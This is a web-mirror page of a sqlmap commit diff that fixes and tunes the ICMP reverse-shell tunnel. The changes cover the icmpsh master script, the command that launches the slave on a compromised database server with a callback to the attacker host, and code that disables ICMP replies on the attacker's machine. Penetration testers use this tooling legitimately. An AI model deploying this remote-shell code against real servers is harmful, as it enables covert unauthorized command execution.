sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-10-31 16:07:55 +03:00
Code Issues Packages Projects Releases Wiki Activity

Minor bug fixes and enhancements to ICMPsh tunnel

Browse Source
This commit is contained in:
Bernardo Damele 2010-10-27 23:01:17 +00:00
parent 26cf6c2136
commit 56c16cb471
3 changed files with 22 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
extra/icmpsh/icmpsh_m.py
View File

@ -85,7 +85,7 @@ def main(src, dst):
data = icmppacket.get_data_as_string() data = icmppacket.get_data_as_string()
if len(data) > 0: if len(data) > 0:
print data sys.stdout.write(data)
# Parse command from standard input # Parse command from standard input
try: try:
@ -94,9 +94,7 @@ def main(src, dst):
pass pass
if cmd == 'exit': if cmd == 'exit':
break return
cmd += '\n'
# Set sequence number and identifier # Set sequence number and identifier
icmp.set_icmp_id(ident) icmp.set_icmp_id(ident)
@ -116,7 +114,7 @@ def main(src, dst):
sock.sendto(ip.get_packet(), (dst, 0)) sock.sendto(ip.get_packet(), (dst, 0))
if __name__ == '__main__': if __name__ == '__main__':
if len(sys.argv) < 2: if len(sys.argv) < 3:
print 'missing mandatory options. Execute as root:' print 'missing mandatory options. Execute as root:'
print './icmpsh-m.py <source IP address> <destination IP address>' print './icmpsh-m.py <source IP address> <destination IP address>'
sys.exit(1) sys.exit(1)

2
lib/takeover/icmpsh.py
View File

@ -81,7 +81,7 @@ class ICMPsh:
infoMsg = "running icmpsh slave remotely" infoMsg = "running icmpsh slave remotely"
logger.info(infoMsg) logger.info(infoMsg)
self.__icmpshSlaveCmd = "%s -t %s" % (self.__icmpslaveRemote, self.lhostStr) self.__icmpshSlaveCmd = "%s -t %s -d 500 -b 30 -s 128" % (self.__icmpslaveRemote, self.lhostStr)
cmd = "%s &" % self.__icmpshSlaveCmd cmd = "%s &" % self.__icmpshSlaveCmd

19
plugins/generic/takeover.py
View File

@ -7,6 +7,8 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
import os
from lib.core.common import readInput from lib.core.common import readInput
from lib.core.common import runningAsAdmin from lib.core.common import runningAsAdmin
from lib.core.data import conf from lib.core.data import conf
@ -109,7 +111,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
warnMsg = "invalid value, valid values are 1 and 2" warnMsg = "invalid value, valid values are 1 and 2"
logger.warn(warnMsg) logger.warn(warnMsg)
if tunnel == 2 and kb.dbms != "Windows": if tunnel == 2 and kb.os != "Windows":
errMsg = "icmpsh slave is only supported on Windows at " errMsg = "icmpsh slave is only supported on Windows at "
errMsg += "the moment. The back-end database server is " errMsg += "the moment. The back-end database server is "
errMsg += "not. sqlmap will fallback to TCP (Metasploit)" errMsg += "not. sqlmap will fallback to TCP (Metasploit)"
@ -136,6 +138,21 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
errMsg += "http://oss.coresecurity.com/projects/impacket.html" errMsg += "http://oss.coresecurity.com/projects/impacket.html"
raise sqlmapMissingDependence, errMsg raise sqlmapMissingDependence, errMsg
sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all"
if os.path.exists(sysIgnoreIcmp):
fp = open(sysIgnoreIcmp, "wb")
fp.write("1")
fp.close()
else:
errMsg = "you need to disable ICMP replies by your machine "
errMsg += "system-wide. For example run on Linux/Unix:\n"
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n"
errMsg += "If you miss doing that, you will receive "
errMsg += "information from the database server and it "
errMsg += "is unlikely to receive commands send from you"
logger.error(errMsg)
if kb.stackedTest or conf.direct: if kb.stackedTest or conf.direct:
web = False web = False